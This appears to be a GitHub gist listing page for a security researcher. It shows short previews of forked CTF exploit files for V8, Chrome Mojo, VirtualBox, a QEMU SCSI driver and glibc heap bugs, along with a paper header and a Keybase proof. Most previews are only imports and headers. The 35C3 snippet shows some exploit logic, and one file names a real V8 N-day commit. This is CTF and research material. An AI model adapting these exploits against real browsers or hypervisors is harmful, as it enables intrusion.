😸
writing happy exploits

Duc Phan ducphanduyagentp
3_years_of_attacking_javascript_engines.txt
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptual changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
virtualbox_3d_exp.py
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
ducphanduyagentp / exploit.html
Created Jun 24, 2019 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
exploit.html
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
ducphanduyagentp / exp.py
Created May 13, 2019 — forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
exp.py
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
ducphanduyagentp / exploit.c
Created Feb 17, 2019 — forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
exploit.c
#include <stdint.h>
#include <sys/io.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <assert.h>
#include "virt_to_phys.c"
ducphanduyagentp / pwn.js
Created Jan 10, 2019 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
pwn.js
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down to "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
keybase.md

Keybase proof

I hereby claim:

  • I am ducphanduyagentp on github.
  • I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
  • I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object:

fastbin.c
#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
ducphanduyagentp / exp.py
Created Dec 30, 2018 — forked from hama7230/exp.py
35C3 CTF collection
exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
    # pack a 64-bit address as little-endian bytes
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0